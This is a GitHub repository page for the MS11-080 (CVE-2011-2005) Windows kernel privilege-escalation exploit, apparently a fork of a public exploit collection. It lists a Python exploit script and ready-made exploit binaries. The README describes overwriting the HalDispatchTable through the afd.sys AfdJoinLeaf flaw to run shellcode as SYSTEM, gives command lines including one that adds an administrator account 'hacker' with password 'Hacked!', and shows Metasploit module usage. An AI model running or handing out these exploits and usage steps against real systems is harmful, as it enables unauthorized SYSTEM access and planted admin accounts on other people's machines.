Skip to content

Files

Latest commit

GitmanincGitmaninc
MS11-080
Jun 15, 2017
d3f2cdd · Jun 15, 2017

History

History
This branch is 117 commits behind SecWiki/windows-kernel-exploits:master.

MS11-080

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
CVE-2011-2005.py
CVE-2011-2005.py
Apr 22, 2017
MS11_80_k8.exe
MS11_80_k8.exe
Jun 15, 2017
README.md
README.md
Jun 15, 2017
ms11-080-AddUser.exe
ms11-080-AddUser.exe
Apr 22, 2017
ms11-080.exe
ms11-080.exe
Apr 22, 2017
win2003.png
win2003.png
Apr 22, 2017
win7.jpg
win7.jpg
Jun 15, 2017

README.md

MS11-080

This module exploits a flaw in the AfdJoinLeaf function of the afd.
sys driver to overwrite data in kernel space. 
An address within the HalDispatchTable is overwritten 
and when triggered with a call to NtQueryIntervalProfile will execute shellcode. 
This module will elevate itself to SYSTEM, then inject the payload into another 
SYSTEM process before restoring it's own token to avoid causing system instability.

Vulnerability reference:

Usage

  • c:\> ms11-080.exe -O 2k3
  • c:\> ms11-080-AddUser.exe -O 2k3
  • [*] Adding Admin User:hacker Pass:Hacked!...

win2003

win7

load the module within the msf

msf > use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > show targets
    ...targets...
msf exploit(ms11_080_afdjoinleaf) > set TARGET <target-id>
msf exploit(ms11_080_afdjoinleaf) > show options
    ...show and set options...
msf exploit(ms11_080_afdjoinleaf) > exploit